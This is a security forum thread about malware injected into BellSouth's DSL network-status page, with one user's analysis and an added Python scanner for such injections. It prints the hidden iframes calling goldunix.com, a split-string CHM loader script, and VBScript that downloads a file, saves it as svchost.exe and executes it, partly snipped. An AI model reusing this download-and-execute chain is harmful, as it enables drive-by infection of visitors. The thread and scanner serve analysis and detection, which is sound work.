 n2qew Premium join:2004-08-22 Leland, NC
1 edit | Bellsouth Support page Virus infected
This morning I went to the Bellsouth DSL support page and clicked on "Network Status". After selecting my location, I got a virus warning from Symantec AV indicating HKER_1~1.HTM is a downloader trojan. I tried it again at work, and McAfee gave similar results. Attempts to get the third world support at Bellsouth/The New AT&T support resulted in them explaining that they "didn't handle web issues". Great answer!
If you want to see for yourself (make sure your AV is active first) either go directly to the link below, or start at www.bellsouth.net -> Help and tech support (top right) - network status (top right) -> pick any city for status. You should get an AV warning at this point.
hxxp://home.bellsouth.net/csbellsouth/s/s.dll?spage=cg/sys/networkstatus_homepage.htm&usertype=DSL |
|
  redxii too big to fail Premium,Mod join:2001-02-26 Texas
Host: /dev/null Broadband Tweaks Suddenlink ISDN Fiber Optic
4 edits | Looks suspicious to me. The ActiveX control is C:\Program Files\Common Files\System\msadc\msadco.dll. Some Google references:
»support.microsoft.com/kb/329414 »www.microsoft.com/technet/securi···014.mspx »www.microsoft.com/technet/securi···009.mspx
Allowing the ActiveX control doesn't do anything, admin or non-admin. |
|
  SpannerITWks Premium join:2005-04-22
| reply to n2qew
 Test |
Yep, more than suspicious, Red!
Spanner |
|
  Howyoudoing
@swbell.net | reply to n2qew This required JS to be enabled.
My AV says it's a virus Exploit.JS.ADODB.Stream.k
Is this a virus or spyware? |
|
 Mele20 Premium join:2001-06-05 Hilo, HI 1 edit | reply to SpannerITWks Has it been fixed? I just went there and I have Avira Personal Premium that updated about 5 minutes ago and nothing happened.
edit: JavaScript is enabled on Fx but maybe Proxo blocked it. |
|
  redxii too big to fail Premium,Mod join:2001-02-26 Texas
| It's an ActiveX exploit. Given the CLSID in the code, it is for MS06-014.
Firefox isn't affected anyway. IE7 requires the user to allow the control, but if one has IE7 it would be hard to believe that they haven't been keeping up with patching since longer than February 2006. |
|
 mysec Premium join:2005-11-29
1 edit | reply to n2qew This exploit used two different methods to download test.htm.
Code from the bellsouth page: iframe downloads two *.html files
<!-- This is the main "body" cell of the system status page. -->
.......<snip>.....
<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>
File 1: index.html - downloads mm1.html
<frame src="mm1.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0"> </frameset>
mm1.html: downloads a .chm file which calls out to download test.htm, which turns out to be an executable:
<SCRIPT language=JavaScript>
var url = document.location.href;
url = url.substring(0, url.lastIndexOf('/'));
var mhStr = 'mk:'+'@MSI'+'TStor'+'e:mhtml'+': c:'+'\\'+'\\'+'.mht!';
document.write('<OBJECT Width = 0 Height = 0 style="display:none;" type ="text/x-scriptlet" data="' + mhStr + url + '/test.chm::/test.htm"></OBJECT>');
window.status = " ";
</SCRIPT>
....snip.....
(excerpt from the .chm, binary bytes omitted:) /$WWKeywordLinks/Property ... /test.exe ... /test.htm
File 2: hker.htm - does two things,
1) downloads test.htm
2) sets up to create svchost.exe
<script language="VBScript">
on error resume next
dl = "http://www.goldunix.com/test.htm"
.....<snip>......
x.Send
fname1 = "svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1 = F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head> <title>Hello!!!</title>
Both actions are blocked:
(screenshot)
Letting the exploit run: it copies itself as svchost.exe into c:..\temp (typical malware action)
(screenshot)
svchost.exe is the downloader and attempts to connect to the internet:
(screenshot)
Scans of both test.htm and svchost.exe reveal they are the same file:
(screenshot)
(screenshot)
Same old tricks attempting to install a trojan.
regards,
-rich
______________________________________________ "Talking About Security Can Lead To Anxiety, Panic, And Dread... Or Cool Assessments, Common Sense And Practical Planning..." --Bruce Schneier |
|
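Added example, not code from mysec's post or from the thread: a small static triage scanner for the two things the analysis above (and redxii's MS06-014 identification) points at, namely hidden iframes injected into a legitimate page that pull content from another host, and script text carrying the MDAC/ADODB.Stream download-and-execute chain. It also handles the split-string trick from mm1.htm, where 'mk:@MSITStore' is assembled from fragments so a naive substring match never sees it. Standard library only. The IOC list and the sample page are constructed here, modeled on the snippets quoted in the post; the same-host visible iframe in the sample is made up for contrast and is not from the BellSouth page.

```python
"""Static triage of a saved HTML page for the injection pattern analysed in the
thread: hidden off-site iframes plus script that drives the MDAC/ADODB.Stream
download-and-execute chain.  Added example; the IOC list and the sample page are
constructed here, modeled on the snippets quoted in the post.  Stdlib only."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from the mm1.htm / hker.htm snippets (matched lower-case,
# after the concatenation collapse below).
SCRIPT_IOCS = (
    "mk:@msitstore",               # CHM/MHTML protocol handler, mm1.htm loader
    "text/x-scriptlet",            # OBJECT type used to run the CHM content
    "adodb.stream",                # MS06-014: write an HTTP body to disk
    "scripting.filesystemobject",  # locate %TEMP% for the drop
    ".savetofile",
    "shell.application",           # ShellExecute the dropped svchost.exe
    "shellexecute",
)

# 'mk:'+'@MSI'+'TStor' -> 'mk:@MSITStor'.  Matches two adjacent string literals
# joined by + (JScript) or & (VBScript); applied until nothing changes.
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*[+&]\s*(['"])([^'"]*)\3""")


def normalize_script(src: str) -> str:
    """Collapse split-string evasion and lower-case the script for matching."""
    prev = None
    while prev != src:
        prev = src
        src = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), src)
    return src.lower()


class InjectionScanner(HTMLParser):
    """Flags hidden cross-host frames and script text containing known IOCs."""

    def __init__(self, page_url: str) -> None:
        super().__init__()
        self.page_host = (urlparse(page_url).hostname or "").lower()
        self.findings = []      # list of human-readable flags
        self._script = None     # list of text chunks while inside <script>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag in ("iframe", "frame"):
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            # Accept the attacker's misspelled attribute too: 'widht=0' is not
            # a size the browser honours, but it is still a strong signal.
            zero = any(a.get(k, "").strip() == "0"
                       for k in ("width", "height", "widht", "heigth"))
            hidden = zero or "display:none" in a.get("style", "").replace(" ", "").lower()
            if host and host != self.page_host and hidden:
                self.findings.append(f"hidden off-site {tag} -> {a['src']}")
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            text = normalize_script("".join(self._script))
            self._script = None
            self.findings.extend(f"script IOC: {ioc}" for ioc in SCRIPT_IOCS if ioc in text)


def scan_html(page_url: str, html: str) -> list:
    """Return the findings for one page (empty list = nothing flagged)."""
    scanner = InjectionScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the goldunix.com iframes and the script fragments follow
# the thread's snippets; the first (same-host, visible) iframe is made up to
# show that an ordinary frame is not flagged.
SAMPLE_PAGE_URL = "http://home.bellsouth.net/csbellsouth/s/s.dll?spage=cg/sys/networkstatus_homepage.htm"
SAMPLE_HTML = r"""
<!-- This is the main "body" cell of the system status page. -->
<iframe src=http://home.bellsouth.net/cg/sys/legend.htm width=300 height=80></iframe>
<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>
<SCRIPT language=JavaScript>
var mhStr='mk:'+'@MSI'+'TStor'+'e:mhtml'+': c:'+'\\'+'\\'+'.mht!';
document.write('<OBJECT Width=0 Height=0 type="text/x-scriptlet" data="' + mhStr + '/test.chm::/test.htm"></OBJECT>');
</SCRIPT>
<script language="VBScript">
on error resume next
set S = df.createobject("ADODB.Stream","")
S.write x.responseBody
S.savetofile fname1,2
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("FLAG:", finding)
```

The cross-host test alone is not a verdict (ad networks and CDNs embed off-site frames all the time); it is the combination of a zero-size off-site frame with download-and-execute script content that makes this a triage hit. Run the scanner over the HTML as fetched by the client, not the copy on the origin server, since in this case the injection was in the served page itself.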
  Howyoudoing
@sbcglobal.net | Nice! |
|
  Howyoudoing
@sbcglobal.net
| reply to n2qew said by n2qew: "I tried it again at work, and McAfee gave similar results." Your boss must be very proud, lol |
|
  jazzman916 Life on the Upbeat Premium,Mod join:2001-09-01 Birdland clubs: | reply to n2qew Has also been discussed here: »BellSouth Network Status page gives Norton AntiVirus alert! |
|
 mysec Premium join:2005-11-29
| reply to redxii said by redxii: "IE7 requires the user to allow the control,..." IE6 also prompts, if *prompt* is enabled in Options.
But this brings up an interesting point: if you are a BellSouth user and you are checking your service status on this page, wouldn't you allow the control, since it is a *legitimate* site?
Or if it were a javascript alert, you might conclude that js is required for the site, as it is on many sites.
quote: but if one has IE7 it would be hard to believe that they haven't been keeping up with patching since longer than February 2006.
Since infected sites employing remote code execution continue to use these old exploits, there must be enough people out there *not* patched, or it would not continue to be profitable to use them.
regards,
-rich |
|
  Howyoudoing
@sbcglobal.net
| said by mysec: "But this brings up an interesting point: if you are a BellSouth user and you are checking your service status on this page, wouldn't you allow the control, since it is a *legitimate* site?" I believe that's a yes.
said by mysec: "Or if it were a javascript alert, you might conclude that js is required for the site, as it is on many sites." Yes also.
I'm sure you knew this already. Yes, interesting, and here's where security layers come into play and save the day.
By trusting a legitimate site I take a layer away (enable JS), but there's layer AV keeping an eye open. If I didn't have layer AV there's layer PG, and so on. |
|
  SpannerITWks Premium join:2005-04-22
| reply to n2qew Mele20
No it hasn't, I just checked and I get the same 3 warnings in quick succession from AntiVir! These are related to the code etc. on the page that's in the screenies RedXII1234 posted.
mysec
I had Scripting etc in IE6 disabled, as usual.
Spanner -- I Only Know What I Know, But I'm Learning all The Time - Stay Safe - Spanner intheWorks /SpannerITWks |
|
 Mele20 Premium join:2001-06-05 Hilo, HI | I switched to IE6 and bypassed Proxo. Allowed Scripting and ActiveX. I chose a city, etc. Avira does not alert. |
|
  exocet_cm I am the law Premium join:2003-03-23 New Orleans, LA clubs:   | reply to mysec Uh oh!  |
|
 n2qew Premium join:2004-08-22 Leland, NC
| reply to Howyoudoing said by Howyoudoing: "said by n2qew: I tried it again at work, and McAfee gave similar results. Your boss must be very proud, lol" Welllll, 1. She didn't know.... 2. I used a barebones imaged machine that was up to date with McAfee just to see if it was a fluke with my machine, and/or a false positive from Symantec AV. If it kilt it, reimaging it wouldn't be a problem. It was also on the hot side of the firewall.
Anyway, with the work others have done, it appears that the AV pops are valid. Bellsouth has no path by which to report this. I've tried several times - even had one of their "customer surveys" to rate their performance on my answering machine when I got home today. I answered with all "4"'s (and that ain't 4 stars, either). |
|
 mysec Premium join:2005-11-29
| reply to Mele20 said by Mele20: "Avira does not alert." Neither do some others, although it's changing.
See here for scans of all of the files:
»urs2.net/rsj/computing/tests/bellsouth/scans
regards,
-rich |
|
Mele20 Premium join:2001-06-05 Hilo, HI | Avira has been alerting for Spanner for some time, so I don't understand why your screenshots from Jotti's don't show Avira alerting until very recently. I don't know why Avira alerts for Spanner and not me. |
|
 mysec Premium join:2005-11-29 | I don't see Avira on Jotti's list.
-rich |
|
 Mele20 Premium join:2001-06-05 Hilo, HI | I thought I saw avira detecting on your later screenshots...those were all Jotti weren't they?
So, am I infected since Avira doesn't detect anything? |
|